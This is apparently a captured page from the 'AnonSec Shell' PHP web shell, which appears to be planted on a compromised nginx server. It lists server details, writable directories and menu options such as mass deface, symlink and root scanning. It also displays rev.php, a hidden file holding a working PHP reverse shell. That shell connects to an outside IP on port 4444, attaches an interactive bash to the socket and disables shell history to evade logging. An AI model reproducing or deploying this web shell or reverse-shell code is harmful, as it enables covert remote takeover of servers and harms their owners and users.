AnonSec Shell
Server IP : 198.244.165.102  /  Your IP : 216.73.216.218   [ Reverse IP ]
Web Server : nginx/1.24.0
System : Linux modovh-ub-01 6.8.0-138-generic #138-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 31 22:41:49 UTC 2026 x86_64
User : colleary ( 1011)
PHP Version : 8.3.23
Disable Function : NONE
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/atir/public_html/.tmb/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/atir/public_html/.tmb/rev.php
<?php
$ip = '94.26.106.34';
$port = 4444;

$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    echo "Baglanti hatasi: $errstr ($errno)";
    exit;
}

$descriptorspec = array(
    0 => $sock,  // stdin
    1 => $sock,  // stdout
    2 => $sock   // stderr
);

$process = proc_open('/bin/bash -i', $descriptorspec, $pipes);

if (is_resource($process)) {
    // Shell'i daha stabil hale getirmek için ekstra komutlar gönder
    fwrite($pipes[0], "export TERM=xterm; export PS1='\$ '; unset HISTFILE; \n");
    fclose($pipes[0]);
    proc_close($process);
} else {
    echo "proc_open calismadi";
}
?>

Anon7 - 2022
AnonSec Team